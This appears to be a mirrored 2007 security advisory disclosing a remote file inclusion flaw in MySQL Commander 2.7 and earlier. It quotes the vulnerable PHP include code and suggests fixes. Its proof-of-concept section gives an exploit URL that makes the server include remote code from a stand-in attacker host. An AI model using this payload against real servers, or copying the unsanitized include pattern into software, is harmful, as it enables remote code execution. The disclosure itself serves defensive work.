Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16334
HistoryMar 13, 2007 - 12:00 a.m.

[ECHO_ADV_73$2007] MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability

2007-03-1300:00:00
vulners.com
29

[ECHO_ADV_73$2007] MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability

Author : M.Hasran Addahroni
Date : March, 13th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv73-K-159-2007.txt
Critical Lvl : Dangerous
Impact : System access
Where : From Remote

Affected software description:


Application   : MySQL Commander 
version       : &lt;= 2.7
Vendor        : http://www.bitesser.de/freeware/script.php?id=1
Description :

A small tool to backup and restore MySQL Tables. Features: backup/restore of binaries; parametric backup; multiserver; Gzipping; killing of backup files; german/english; Online help in popup.
This tool makes backups of all the tables in a database. The data will be stored in textfiles located in the &quot;data&quot;directory. You can backup and restore the &quot;SQL create table command&quot; and the &quot;content&quot;. So you can easily make copies of your tables. &#40;i.e. copy a hole database with a few clicks&#41;.
You will need PHP since version 4.1 and MySQL since Version 3.23

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~
- Invalid include function at ressourcen/dbopen.php :  
        
----------------ressourcen/dbopen.php-------------------
&lt;?php
include $home.&quot;ressourcen/class.systemObject.php&quot;;
include $home.&quot;ressourcen/class.DatabaseMysql.php&quot;;
$db = new DatabaseMysql&#40;$config-&gt;dbuser[$_SESSION[&#39;which_db&#39;]], $config-&gt;dbpass[$_SESSION[&#39;which_db&#39;]], $config-&gt;dbserver[$_SESSION[&#39;which_db&#39;]]&#41;;
$ok = $db-&gt;init&#40;&#41;;

if &#40;!$ok and $db-&gt;error and &#40;strlen&#40;$config-&gt;dbserver[1]&#41; &gt; 0&#41;&#41; {
        echo $db-&gt;getError&#40;&#41;;
}

?&gt;
----------------------------------------------------------------


Variables $home is not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[mysqlcommander_path]/ressourcen/dbopen.php?home=http://attacker.com/evil?


Solution:
~~~~~~

- Sanitize variable $home on affected file.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, and my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S&#96;to,lirva32,negative, str0ke &#40;for the best comments&#41;
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ [email protected]
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------